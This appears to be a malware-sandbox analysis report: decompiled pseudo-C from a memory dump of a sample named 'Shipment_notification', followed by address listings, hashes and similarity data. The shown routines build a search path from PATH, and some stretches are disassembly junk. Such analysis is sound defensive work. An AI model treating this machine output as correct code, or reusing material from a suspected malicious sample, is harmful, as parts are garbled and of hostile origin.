                                                                                			E01B12581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35, char _a1546912173) {
                                                                                				signed int _v8;
                                                                                				signed int _v16;
                                                                                				unsigned int _v24;
                                                                                				void* _v28;
                                                                                				signed int _v32;
                                                                                				unsigned int _v36;
                                                                                				signed int _v37;
                                                                                				signed int _v40;
                                                                                				signed int _v44;
                                                                                				signed int _v48;
                                                                                				signed int _v52;
                                                                                				signed int _v56;
                                                                                				intOrPtr _v60;
                                                                                				signed int _v64;
                                                                                				signed int _v68;
                                                                                				signed int _v72;
                                                                                				signed int _v76;
                                                                                				signed int _v80;
                                                                                				signed int _t240;
                                                                                				signed int _t244;
                                                                                				void* _t245;
                                                                                				signed int _t248;
                                                                                				signed int _t250;
                                                                                				intOrPtr _t252;
                                                                                				signed int _t255;
                                                                                				signed int _t262;
                                                                                				signed int _t265;
                                                                                				signed int _t273;
                                                                                				signed int _t279;
                                                                                				signed int _t281;
                                                                                				void* _t283;
                                                                                				signed int _t284;
                                                                                				unsigned int _t287;
                                                                                				signed int _t291;
                                                                                				signed int _t299;
                                                                                				signed int _t303;
                                                                                				intOrPtr _t315;
                                                                                				signed int _t324;
                                                                                				signed int _t326;
                                                                                				signed int _t327;
                                                                                				signed int _t331;
                                                                                				signed int _t332;
                                                                                				void* _t334;
                                                                                				signed int _t336;
                                                                                				signed int _t338;
                                                                                				signed int _t340;
                                                                                				void* _t341;
                                                                                				signed int _t343;
                                                                                
                                                                                				_t338 = _t340;
                                                                                				_t341 = _t340 - 0x4c;
                                                                                				_v8 =  *0x1bdd360 ^ _t338;
                                                                                				_push(__ebx);
                                                                                				_push(__esi);
                                                                                				_push(__edi);
                                                                                				_t331 = 0x1bdb2e8;
                                                                                				_v56 = _a4;
                                                                                				_v48 = __edx;
                                                                                				_v60 = __ecx;
                                                                                				_t287 = 0;
                                                                                				_v80 = 0;
                                                                                				asm("movsd");
                                                                                				_v64 = 0;
                                                                                				_v76 = 0;
                                                                                				_v72 = 0;
                                                                                				asm("movsd");
                                                                                				_v44 = 0;
                                                                                				_v52 = 0;
                                                                                				_v68 = 0;
                                                                                				asm("movsd");
                                                                                				_v32 = 0;
                                                                                				_v36 = 0;
                                                                                				asm("movsd");
                                                                                				_v16 = 0;
                                                                                				_t279 = 0x48;
                                                                                				_t313 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                                                                                				_t324 = 0;
                                                                                				_v37 = _t313;
                                                                                				if(_v48 <= 0) {
                                                                                					L16:
                                                                                					_t45 = _t279 - 0x48; // 0x0
                                                                                					__eflags = _t45 - 0xfffe;
                                                                                					if(_t45 > 0xfffe) {
                                                                                						_t332 = 0xc0000106;
                                                                                						goto L32;
                                                                                					} else {
                                                                                						_t331 = L01B04620(_t287,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t279);
                                                                                						_v52 = _t331;
                                                                                						__eflags = _t331;
                                                                                						if(_t331 == 0) {
                                                                                							_t332 = 0xc0000017;
                                                                                							goto L32;
                                                                                						} else {
                                                                                							 *(_t331 + 0x44) =  *(_t331 + 0x44) & 0x00000000;
                                                                                							_t50 = _t331 + 0x48; // 0x48
                                                                                							_t326 = _t50;
                                                                                							_t313 = _v32;
                                                                                							 *(_t331 + 0x3c) = _t279;
                                                                                							_t281 = 0;
                                                                                							 *((short*)(_t331 + 0x30)) = _v48;
                                                                                							__eflags = _t313;
                                                                                							if(_t313 != 0) {
                                                                                								 *(_t331 + 0x18) = _t326;
                                                                                								__eflags = _t313 - 0x1bd8478;
                                                                                								 *_t331 = ((0 | _t313 == 0x01bd8478) - 0x00000001 & 0xfffffffb) + 7;
                                                                                								E01B2F3E0(_t326,  *((intOrPtr*)(_t313 + 4)),  *_t313 & 0x0000ffff);
                                                                                								_t313 = _v32;
                                                                                								_t341 = _t341 + 0xc;
                                                                                								_t281 = 1;
                                                                                								__eflags = _a8;
                                                                                								_t326 = _t326 + (( *_t313 & 0x0000ffff) >> 1) * 2;
                                                                                								if(_a8 != 0) {
                                                                                									_t273 = E01B739F2(_t326);
                                                                                									_t313 = _v32;
                                                                                									_t326 = _t273;
                                                                                								}
                                                                                							}
                                                                                							_t291 = 0;
                                                                                							_v16 = 0;
                                                                                							__eflags = _v48;
                                                                                							if(_v48 <= 0) {
                                                                                								L31:
                                                                                								_t332 = _v68;
                                                                                								__eflags = 0;
                                                                                								 *((short*)(_t326 - 2)) = 0;
                                                                                								goto L32;
                                                                                							} else {
                                                                                								_t279 = _t331 + _t281 * 4;
                                                                                								_v56 = _t279;
                                                                                								do {
                                                                                									__eflags = _t313;
                                                                                									if(_t313 != 0) {
                                                                                										_t240 =  *(_v60 + _t291 * 4);
                                                                                										__eflags = _t240;
                                                                                										if(_t240 == 0) {
                                                                                											goto L30;
                                                                                										} else {
                                                                                											__eflags = _t240 == 5;
                                                                                											if(_t240 == 5) {
                                                                                												goto L30;
                                                                                											} else {
                                                                                												goto L22;
                                                                                											}
                                                                                										}
                                                                                									} else {
                                                                                										L22:
                                                                                										 *_t279 =  *(_v60 + _t291 * 4);
                                                                                										 *(_t279 + 0x18) = _t326;
                                                                                										_t244 =  *(_v60 + _t291 * 4);
                                                                                										__eflags = _t244 - 8;
                                                                                										if(_t244 > 8) {
                                                                                											goto L56;
                                                                                										} else {
                                                                                											switch( *((intOrPtr*)(_t244 * 4 +  &M01B12959))) {
                                                                                												case 0:
                                                                                													__ax =  *0x1bd8488;
                                                                                													__eflags = __ax;
                                                                                													if(__ax == 0) {
                                                                                														goto L29;
                                                                                													} else {
                                                                                														__ax & 0x0000ffff = E01B2F3E0(__edi,  *0x1bd848c, __ax & 0x0000ffff);
                                                                                														__eax =  *0x1bd8488 & 0x0000ffff;
                                                                                														goto L26;
                                                                                													}
                                                                                													goto L108;
                                                                                												case 1:
                                                                                													L45:
                                                                                													E01B2F3E0(_t326, _v80, _v64);
                                                                                													_t268 = _v64;
                                                                                													goto L26;
                                                                                												case 2:
                                                                                													 *0x1bd8480 & 0x0000ffff = E01B2F3E0(__edi,  *0x1bd8484,  *0x1bd8480 & 0x0000ffff);
                                                                                													__eax =  *0x1bd8480 & 0x0000ffff;
                                                                                													__eax = ( *0x1bd8480 & 0x0000ffff) >> 1;
                                                                                													__edi = __edi + __eax * 2;
                                                                                													goto L28;
                                                                                												case 3:
                                                                                													__eax = _v44;
                                                                                													__eflags = __eax;
                                                                                													if(__eax == 0) {
                                                                                														goto L29;
                                                                                													} else {
                                                                                														__esi = __eax + __eax;
                                                                                														__eax = E01B2F3E0(__edi, _v72, __esi);
                                                                                														__edi = __edi + __esi;
                                                                                														__esi = _v52;
                                                                                														goto L27;
                                                                                													}
                                                                                													goto L108;
                                                                                												case 4:
                                                                                													_push(0x2e);
                                                                                													_pop(__eax);
                                                                                													 *(__esi + 0x44) = __edi;
                                                                                													 *__edi = __ax;
                                                                                													__edi = __edi + 4;
                                                                                													_push(0x3b);
                                                                                													_pop(__eax);
                                                                                													 *(__edi - 2) = __ax;
                                                                                													goto L29;
                                                                                												case 5:
                                                                                													__eflags = _v36;
                                                                                													if(_v36 == 0) {
                                                                                														goto L45;
                                                                                													} else {
                                                                                														E01B2F3E0(_t326, _v76, _v36);
                                                                                														_t268 = _v36;
                                                                                													}
                                                                                													L26:
                                                                                													_t341 = _t341 + 0xc;
                                                                                													_t326 = _t326 + (_t268 >> 1) * 2 + 2;
                                                                                													__eflags = _t326;
                                                                                													L27:
                                                                                													_push(0x3b);
                                                                                													_pop(_t270);
                                                                                													 *((short*)(_t326 - 2)) = _t270;
                                                                                													goto L28;
                                                                                												case 6:
                                                                                													__ebx =  *0x1bd575c;
                                                                                													__eflags = __ebx - 0x1bd575c;
                                                                                													if(__ebx != 0x1bd575c) {
                                                                                														_push(0x3b);
                                                                                														_pop(__esi);
                                                                                														do {
                                                                                															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                                                                															E01B2F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                                                                															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                                                                															__edi = __edi + __eax * 2;
                                                                                															__edi = __edi + 2;
                                                                                															 *(__edi - 2) = __si;
                                                                                															__ebx =  *__ebx;
                                                                                															__eflags = __ebx - 0x1bd575c;
                                                                                														} while (__ebx != 0x1bd575c);
                                                                                														__esi = _v52;
                                                                                														__ecx = _v16;
                                                                                														__edx = _v32;
                                                                                													}
                                                                                													__ebx = _v56;
                                                                                													goto L29;
                                                                                												case 7:
                                                                                													 *0x1bd8478 & 0x0000ffff = E01B2F3E0(__edi,  *0x1bd847c,  *0x1bd8478 & 0x0000ffff);
                                                                                													__eax =  *0x1bd8478 & 0x0000ffff;
                                                                                													__eax = ( *0x1bd8478 & 0x0000ffff) >> 1;
                                                                                													__eflags = _a8;
                                                                                													__edi = __edi + __eax * 2;
                                                                                													if(_a8 != 0) {
                                                                                														__ecx = __edi;
                                                                                														__eax = E01B739F2(__ecx);
                                                                                														__edi = __eax;
                                                                                													}
                                                                                													goto L28;
                                                                                												case 8:
                                                                                													__eax = 0;
                                                                                													 *(__edi - 2) = __ax;
                                                                                													 *0x1bd6e58 & 0x0000ffff = E01B2F3E0(__edi,  *0x1bd6e5c,  *0x1bd6e58 & 0x0000ffff);
                                                                                													 *(__esi + 0x38) = __edi;
                                                                                													__eax =  *0x1bd6e58 & 0x0000ffff;
                                                                                													__eax = ( *0x1bd6e58 & 0x0000ffff) >> 1;
                                                                                													__edi = __edi + __eax * 2;
                                                                                													__edi = __edi + 2;
                                                                                													L28:
                                                                                													_t291 = _v16;
                                                                                													_t313 = _v32;
                                                                                													L29:
                                                                                													_t279 = _t279 + 4;
                                                                                													__eflags = _t279;
                                                                                													_v56 = _t279;
                                                                                													goto L30;
                                                                                											}
                                                                                										}
                                                                                									}
                                                                                									goto L108;
                                                                                									L30:
                                                                                									_t291 = _t291 + 1;
                                                                                									_v16 = _t291;
                                                                                									__eflags = _t291 - _v48;
                                                                                								} while (_t291 < _v48);
                                                                                								goto L31;
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				} else {
                                                                                					while(1) {
                                                                                						L1:
                                                                                						_t244 =  *(_v60 + _t324 * 4);
                                                                                						if(_t244 > 8) {
                                                                                							break;
                                                                                						}
                                                                                						switch( *((intOrPtr*)(_t244 * 4 +  &M01B12935))) {
                                                                                							case 0:
                                                                                								__ax =  *0x1bd8488;
                                                                                								__eflags = __ax;
                                                                                								if(__ax != 0) {
                                                                                									__eax = __ax & 0x0000ffff;
                                                                                									__ebx = __ebx + 2;
                                                                                									__eflags = __ebx;
                                                                                									goto L53;
                                                                                								}
                                                                                								goto L14;
                                                                                							case 1:
                                                                                								L44:
                                                                                								_t313 =  &_v64;
                                                                                								_v80 = L01B12E3E(0,  &_v64);
                                                                                								_t279 = _t279 + _v64 + 2;
                                                                                								goto L13;
                                                                                							case 2:
                                                                                								__eax =  *0x1bd8480 & 0x0000ffff;
                                                                                								__ebx = __ebx + __eax;
                                                                                								__eflags = __dl;
                                                                                								if(__dl != 0) {
                                                                                									__eax = 0x1bd8480;
                                                                                									goto L80;
                                                                                								}
                                                                                								goto L14;
                                                                                							case 3:
                                                                                								__eax = E01AFEEF0(0x1bd79a0);
                                                                                								__eax =  &_v44;
                                                                                								_push(__eax);
                                                                                								_push(0);
                                                                                								_push(0);
                                                                                								_push(4);
                                                                                								_push(L"PATH");
                                                                                								_push(0);
                                                                                								L57();
                                                                                								__esi = __eax;
                                                                                								_v68 = __esi;
                                                                                								__eflags = __esi - 0xc0000023;
                                                                                								if(__esi != 0xc0000023) {
                                                                                									L10:
                                                                                									__eax = E01AFEB70(__ecx, 0x1bd79a0);
                                                                                									__eflags = __esi - 0xc0000100;
                                                                                									if(__esi == 0xc0000100) {
                                                                                										_v44 = _v44 & 0x00000000;
                                                                                										__eax = 0;
                                                                                										_v68 = 0;
                                                                                										goto L13;
                                                                                									} else {
                                                                                										__eflags = __esi;
                                                                                										if(__esi < 0) {
                                                                                											L32:
                                                                                											_t218 = _v72;
                                                                                											__eflags = _t218;
                                                                                											if(_t218 != 0) {
                                                                                												L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
                                                                                											}
                                                                                											_t219 = _v52;
                                                                                											__eflags = _t219;
                                                                                											if(_t219 != 0) {
                                                                                												__eflags = _t332;
                                                                                												if(_t332 < 0) {
                                                                                													L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t219);
                                                                                													_t219 = 0;
                                                                                												}
                                                                                											}
                                                                                											goto L36;
                                                                                										} else {
                                                                                											__eax = _v44;
                                                                                											__ebx = __ebx + __eax * 2;
                                                                                											__ebx = __ebx + 2;
                                                                                											__eflags = __ebx;
                                                                                											L13:
                                                                                											_t287 = _v36;
                                                                                											goto L14;
                                                                                										}
                                                                                									}
                                                                                								} else {
                                                                                									__eax = _v44;
                                                                                									__ecx =  *0x1bd7b9c; // 0x0
                                                                                									_v44 + _v44 =  *[fs:0x30];
                                                                                									__ecx = __ecx + 0x180000;
                                                                                									__eax = L01B04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                                                                									_v72 = __eax;
                                                                                									__eflags = __eax;
                                                                                									if(__eax == 0) {
                                                                                										__eax = E01AFEB70(__ecx, 0x1bd79a0);
                                                                                										__eax = _v52;
                                                                                										L36:
                                                                                										_pop(_t325);
                                                                                										_pop(_t333);
                                                                                										__eflags = _v8 ^ _t338;
                                                                                										_pop(_t280);
                                                                                										return L01B2B640(_t219, _t280, _v8 ^ _t338, _t313, _t325, _t333);
                                                                                									} else {
                                                                                										__ecx =  &_v44;
                                                                                										_push(__ecx);
                                                                                										_push(_v44);
                                                                                										_push(__eax);
                                                                                										_push(4);
                                                                                										_push(L"PATH");
                                                                                										_push(0);
                                                                                										L57();
                                                                                										__esi = __eax;
                                                                                										_v68 = __eax;
                                                                                										goto L10;
                                                                                									}
                                                                                								}
                                                                                								goto L108;
                                                                                							case 4:
                                                                                								__ebx = __ebx + 4;
                                                                                								goto L14;
                                                                                							case 5:
                                                                                								_t275 = _v56;
                                                                                								if(_v56 != 0) {
                                                                                									_t313 =  &_v36;
                                                                                									_t277 = L01B12E3E(_t275,  &_v36);
                                                                                									_t287 = _v36;
                                                                                									_v76 = _t277;
                                                                                								}
                                                                                								if(_t287 == 0) {
                                                                                									goto L44;
                                                                                								} else {
                                                                                									_t279 = _t279 + 2 + _t287;
                                                                                								}
                                                                                								goto L14;
                                                                                							case 6:
                                                                                								__eax =  *0x1bd5764 & 0x0000ffff;
                                                                                								goto L53;
                                                                                							case 7:
                                                                                								__eax =  *0x1bd8478 & 0x0000ffff;
                                                                                								__ebx = __ebx + __eax;
                                                                                								__eflags = _a8;
                                                                                								if(_a8 != 0) {
                                                                                									__ebx = __ebx + 0x16;
                                                                                									__ebx = __ebx + __eax;
                                                                                								}
                                                                                								__eflags = __dl;
                                                                                								if(__dl != 0) {
                                                                                									__eax = 0x1bd8478;
                                                                                									L80:
                                                                                									_v32 = __eax;
                                                                                								}
                                                                                								goto L14;
                                                                                							case 8:
                                                                                								__eax =  *0x1bd6e58 & 0x0000ffff;
                                                                                								__eax = ( *0x1bd6e58 & 0x0000ffff) + 2;
                                                                                								L53:
                                                                                								__ebx = __ebx + __eax;
                                                                                								L14:
                                                                                								_t324 = _t324 + 1;
                                                                                								if(_t324 >= _v48) {
                                                                                									goto L16;
                                                                                								} else {
                                                                                									_t313 = _v37;
                                                                                									goto L1;
                                                                                								}
                                                                                								goto L108;
                                                                                						}
                                                                                					}
                                                                                					L56:
                                                                                					asm("int 0x29");
                                                                                					asm("out 0x28, al");
                                                                                					asm("o16 sub [ecx-0x4ed81fff], dh");
                                                                                					 *_t331 =  *_t331 + _t338;
                                                                                					_t334 = _t331 + 1;
                                                                                					 *0xFFFFFFFFB1260502 =  *((intOrPtr*)(0xffffffffb1260502)) - _t313;
                                                                                					 *_t326 =  *_t326 + _t279;
                                                                                					_t283 = 0x25;
                                                                                					_t245 = _t341;
                                                                                					_t343 = _t244;
                                                                                					 *0xFFFFFFFFB55B3502 =  *((intOrPtr*)(0xffffffffb55b3502)) - _t313;
                                                                                					 *_t313 =  *_t313 + _t245;
                                                                                					 *0xFFFFFFFFB1288002 =  *((intOrPtr*)(0xffffffffb1288002)) - _t334;
                                                                                					_t335 = _t334 + _t334;
                                                                                					asm("daa");
                                                                                					_push(ds);
                                                                                					 *0xFFFFFFFFB1284E02 =  *((intOrPtr*)(0xffffffffb1284e02)) - _t313;
                                                                                					_a35 = _a35 + _t283;
                                                                                					asm("fcomp dword [ebx-0x4b]");
                                                                                					 *((intOrPtr*)(_t245 +  &_a1546912173)) =  *((intOrPtr*)(_t245 +  &_a1546912173)) + _t334 + _t334;
                                                                                					asm("int3");
                                                                                					_push(0x20);
                                                                                					_push(0x1bbff00);
                                                                                					E01B3D08C(_t283, _t326, _t335);
                                                                                					_v44 =  *[fs:0x18];
                                                                                					_t327 = 0;
                                                                                					 *_a24 = 0;
                                                                                					_t284 = _a12;
                                                                                					__eflags = _t284;
                                                                                					if(_t284 == 0) {
                                                                                						_t248 = 0xc0000100;
                                                                                					} else {
                                                                                						_v8 = 0;
                                                                                						_t336 = 0xc0000100;
                                                                                						_v52 = 0xc0000100;
                                                                                						_t250 = 4;
                                                                                						while(1) {
                                                                                							_v40 = _t250;
                                                                                							__eflags = _t250;
                                                                                							if(_t250 == 0) {
                                                                                								break;
                                                                                							}
                                                                                							_t303 = _t250 * 0xc;
                                                                                							_v48 = _t303;
                                                                                							__eflags = _t284 -  *((intOrPtr*)(_t303 + 0x1ac1664));
                                                                                							if(__eflags <= 0) {
                                                                                								if(__eflags == 0) {
                                                                                									_t265 = E01B2E5C0(_a8,  *((intOrPtr*)(_t303 + 0x1ac1668)), _t284);
                                                                                									_t343 = _t343 + 0xc;
                                                                                									__eflags = _t265;
                                                                                									if(__eflags == 0) {
                                                                                										_t336 = E01B651BE(_t284,  *((intOrPtr*)(_v48 + 0x1ac166c)), _a16, _t327, _t336, __eflags, _a20, _a24);
                                                                                										_v52 = _t336;
                                                                                										break;
                                                                                									} else {
                                                                                										_t250 = _v40;
                                                                                										goto L62;
                                                                                									}
                                                                                									goto L70;
                                                                                								} else {
                                                                                									L62:
                                                                                									_t250 = _t250 - 1;
                                                                                									continue;
                                                                                								}
                                                                                							}
                                                                                							break;
                                                                                						}
                                                                                						_v32 = _t336;
                                                                                						__eflags = _t336;
                                                                                						if(_t336 < 0) {
                                                                                							__eflags = _t336 - 0xc0000100;
                                                                                							if(_t336 == 0xc0000100) {
                                                                                								_t299 = _a4;
                                                                                								__eflags = _t299;
                                                                                								if(_t299 != 0) {
                                                                                									_v36 = _t299;
                                                                                									__eflags =  *_t299 - _t327;
                                                                                									if( *_t299 == _t327) {
                                                                                										_t336 = 0xc0000100;
                                                                                										goto L76;
                                                                                									} else {
                                                                                										_t315 =  *((intOrPtr*)(_v44 + 0x30));
                                                                                										_t252 =  *((intOrPtr*)(_t315 + 0x10));
                                                                                										__eflags =  *((intOrPtr*)(_t252 + 0x48)) - _t299;
                                                                                										if( *((intOrPtr*)(_t252 + 0x48)) == _t299) {
                                                                                											__eflags =  *(_t315 + 0x1c);
                                                                                											if( *(_t315 + 0x1c) == 0) {
                                                                                												L106:
                                                                                												_t336 = E01B12AE4( &_v36, _a8, _t284, _a16, _a20, _a24);
                                                                                												_v32 = _t336;
                                                                                												__eflags = _t336 - 0xc0000100;
                                                                                												if(_t336 != 0xc0000100) {
                                                                                													goto L69;
                                                                                												} else {
                                                                                													_t327 = 1;
                                                                                													_t299 = _v36;
                                                                                													goto L75;
                                                                                												}
                                                                                											} else {
                                                                                												_t255 = L01AF6600( *(_t315 + 0x1c));
                                                                                												__eflags = _t255;
                                                                                												if(_t255 != 0) {
                                                                                													goto L106;
                                                                                												} else {
                                                                                													_t299 = _a4;
                                                                                													goto L75;
                                                                                												}
                                                                                											}
                                                                                										} else {
                                                                                											L75:
                                                                                											_t336 = E01B12C50(_t299, _a8, _t284, _a16, _a20, _a24, _t327);
                                                                                											L76:
                                                                                											_v32 = _t336;
                                                                                											goto L69;
                                                                                										}
                                                                                									}
                                                                                									goto L108;
                                                                                								} else {
                                                                                									E01AFEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                									_v8 = 1;
                                                                                									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                                                                									_t336 = _a24;
                                                                                									_t262 = E01B12AE4( &_v36, _a8, _t284, _a16, _a20, _t336);
                                                                                									_v32 = _t262;
                                                                                									__eflags = _t262 - 0xc0000100;
                                                                                									if(_t262 == 0xc0000100) {
                                                                                										_v32 = E01B12C50(_v36, _a8, _t284, _a16, _a20, _t336, 1);
                                                                                									}
                                                                                									_v8 = _t327;
                                                                                									E01B12ACB();
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						L69:
                                                                                						_v8 = 0xfffffffe;
                                                                                						_t248 = _t336;
                                                                                					}
                                                                                					L70:
                                                                                					return E01B3D0D1(_t248);
                                                                                				}
                                                                                				L108:
                                                                                			}
                                                                                0x01b127dd
                                                                                0x01b12687
                                                                                0x01b12687
                                                                                0x01b1268a
                                                                                0x01b1268b
                                                                                0x01b1268e
                                                                                0x01b1268f
                                                                                0x01b12691
                                                                                0x01b12696
                                                                                0x01b12698
                                                                                0x01b1269d
                                                                                0x01b1269f
                                                                                0x00000000
                                                                                0x01b1269f
                                                                                0x01b12681
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b12846
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b12605
                                                                                0x01b1260a
                                                                                0x01b1260c
                                                                                0x01b12611
                                                                                0x01b12616
                                                                                0x01b12619
                                                                                0x01b12619
                                                                                0x01b1261e
                                                                                0x00000000
                                                                                0x01b12624
                                                                                0x01b12627
                                                                                0x01b12627
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b55b1f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b12894
                                                                                0x01b1289b
                                                                                0x01b1289d
                                                                                0x01b128a1
                                                                                0x01b55b2b
                                                                                0x01b55b2e
                                                                                0x01b55b2e
                                                                                0x01b128a7
                                                                                0x01b128a9
                                                                                0x01b55b04
                                                                                0x01b55b09
                                                                                0x01b55b09
                                                                                0x01b55b09
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b55b35
                                                                                0x01b55b3c
                                                                                0x01b128fb
                                                                                0x01b128fb
                                                                                0x01b126cc
                                                                                0x01b126cc
                                                                                0x01b126d0
                                                                                0x00000000
                                                                                0x01b126d2
                                                                                0x01b126d2
                                                                                0x00000000
                                                                                0x01b126d2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b125fe
                                                                                0x01b1292d
                                                                                0x01b12930
                                                                                0x01b12935
                                                                                0x01b12939
                                                                                0x01b12940
                                                                                0x01b12945
                                                                                0x01b12946
                                                                                0x01b1294c
                                                                                0x01b1294e
                                                                                0x01b12951
                                                                                0x01b12951
                                                                                0x01b12952
                                                                                0x01b12958
                                                                                0x01b1295a
                                                                                0x01b12960
                                                                                0x01b12962
                                                                                0x01b12965
                                                                                0x01b12966
                                                                                0x01b1296c
                                                                                0x01b12971
                                                                                0x01b12974
                                                                                0x01b1297d
                                                                                0x01b1297e
                                                                                0x01b1297f
                                                                                0x01b12980
                                                                                0x01b12981
                                                                                0x01b12982
                                                                                0x01b12983
                                                                                0x01b12984
                                                                                0x01b12985
                                                                                0x01b12986
                                                                                0x01b12987
                                                                                0x01b12988
                                                                                0x01b12989
                                                                                0x01b1298a
                                                                                0x01b1298b
                                                                                0x01b1298c
                                                                                0x01b1298d
                                                                                0x01b1298e
                                                                                0x01b1298f
                                                                                0x01b12990
                                                                                0x01b12992
                                                                                0x01b12997
                                                                                0x01b129a3
                                                                                0x01b129a6
                                                                                0x01b129ab
                                                                                0x01b129ad
                                                                                0x01b129b0
                                                                                0x01b129b2
                                                                                0x01b55c80
                                                                                0x01b129b8
                                                                                0x01b129b8
                                                                                0x01b129bb
                                                                                0x01b129c0
                                                                                0x01b129c5
                                                                                0x01b129c6
                                                                                0x01b129c6
                                                                                0x01b129c9
                                                                                0x01b129cb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b129cd
                                                                                0x01b129d0
                                                                                0x01b129d9
                                                                                0x01b129db
                                                                                0x01b129dd
                                                                                0x01b12a7f
                                                                                0x01b12a84
                                                                                0x01b12a87
                                                                                0x01b12a89
                                                                                0x01b55ca1
                                                                                0x01b55ca3
                                                                                0x00000000
                                                                                0x01b12a8f
                                                                                0x01b12a8f
                                                                                0x00000000
                                                                                0x01b12a8f
                                                                                0x00000000
                                                                                0x01b129e3
                                                                                0x01b129e3
                                                                                0x01b129e3
                                                                                0x00000000
                                                                                0x01b129e3
                                                                                0x01b129dd
                                                                                0x00000000
                                                                                0x01b129db
                                                                                0x01b129e6
                                                                                0x01b129e9
                                                                                0x01b129eb
                                                                                0x01b129ed
                                                                                0x01b129f3
                                                                                0x01b129f5
                                                                                0x01b129f8
                                                                                0x01b129fa
                                                                                0x01b12a97
                                                                                0x01b12a9a
                                                                                0x01b12a9d
                                                                                0x01b12add
                                                                                0x00000000
                                                                                0x01b12a9f
                                                                                0x01b12aa2
                                                                                0x01b12aa5
                                                                                0x01b12aa8
                                                                                0x01b12aab
                                                                                0x01b55cab
                                                                                0x01b55caf
                                                                                0x01b55cc5
                                                                                0x01b55cda
                                                                                0x01b55cdc
                                                                                0x01b55cdf
                                                                                0x01b55ce5
                                                                                0x00000000
                                                                                0x01b55ceb
                                                                                0x01b55ced
                                                                                0x01b55cee
                                                                                0x00000000
                                                                                0x01b55cee
                                                                                0x01b55cb1
                                                                                0x01b55cb4
                                                                                0x01b55cb9
                                                                                0x01b55cbb
                                                                                0x00000000
                                                                                0x01b55cbd
                                                                                0x01b55cbd
                                                                                0x00000000
                                                                                0x01b55cbd
                                                                                0x01b55cbb
                                                                                0x01b12ab1
                                                                                0x01b12ab1
                                                                                0x01b12ac4
                                                                                0x01b12ac6
                                                                                0x01b12ac6
                                                                                0x00000000
                                                                                0x01b12ac6
                                                                                0x01b12aab
                                                                                0x00000000
                                                                                0x01b12a00
                                                                                0x01b12a09
                                                                                0x01b12a0e
                                                                                0x01b12a21
                                                                                0x01b12a24
                                                                                0x01b12a35
                                                                                0x01b12a3a
                                                                                0x01b12a3d
                                                                                0x01b12a42
                                                                                0x01b12a59
                                                                                0x01b12a59
                                                                                0x01b12a5c
                                                                                0x01b12a5f
                                                                                0x01b12a5f
                                                                                0x01b129fa
                                                                                0x01b129f3
                                                                                0x01b12a64
                                                                                0x01b12a64
                                                                                0x01b12a6b
                                                                                0x01b12a6b
                                                                                0x01b12a6d
                                                                                0x01b12a72
                                                                                0x01b12a72
                                                                                0x00000000

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: PATH
                                                                                • API String ID: 0-1036084923
                                                                                • Opcode ID: d8d46e257f8e74ba697ab25f343e4f2972ad39699de640f1de31df08bc9bdd69
                                                                                • Instruction ID: 1e21e057dfabb90e82b8bc55dbd111622a9287b299c8d03536167835e967b55e
                                                                                • Opcode Fuzzy Hash: d8d46e257f8e74ba697ab25f343e4f2972ad39699de640f1de31df08bc9bdd69
                                                                                • Instruction Fuzzy Hash: B0C19171E00219DFDB2DDF99D880BAEBBB1FF48740F6541A9E901AB254E734A941CB60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 80%
                                                                                			E01B1FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                                                				char _v5;
                                                                                				signed int _v8;
                                                                                				signed int _v12;
                                                                                				char _v16;
                                                                                				char _v17;
                                                                                				char _v20;
                                                                                				signed int _v24;
                                                                                				char _v28;
                                                                                				char _v32;
                                                                                				signed int _v40;
                                                                                				void* __ecx;
                                                                                				void* __edi;
                                                                                				void* __ebp;
                                                                                				signed int _t73;
                                                                                				intOrPtr* _t75;
                                                                                				signed int _t77;
                                                                                				signed int _t79;
                                                                                				signed int _t81;
                                                                                				intOrPtr _t83;
                                                                                				intOrPtr _t85;
                                                                                				intOrPtr _t86;
                                                                                				signed int _t91;
                                                                                				signed int _t94;
                                                                                				signed int _t95;
                                                                                				signed int _t96;
                                                                                				signed int _t106;
                                                                                				signed int _t108;
                                                                                				signed int _t114;
                                                                                				signed int _t116;
                                                                                				signed int _t118;
                                                                                				signed int _t122;
                                                                                				signed int _t123;
                                                                                				void* _t129;
                                                                                				signed int _t130;
                                                                                				void* _t132;
                                                                                				intOrPtr* _t134;
                                                                                				signed int _t138;
                                                                                				signed int _t141;
                                                                                				signed int _t147;
                                                                                				intOrPtr _t153;
                                                                                				signed int _t154;
                                                                                				signed int _t155;
                                                                                				signed int _t170;
                                                                                				void* _t174;
                                                                                				signed int _t176;
                                                                                				signed int _t177;
                                                                                
                                                                                				_t129 = __ebx;
                                                                                				_push(_t132);
                                                                                				_push(__esi);
                                                                                				_t174 = _t132;
                                                                                				_t73 =  !( *( *(_t174 + 0x18)));
                                                                                				if(_t73 >= 0) {
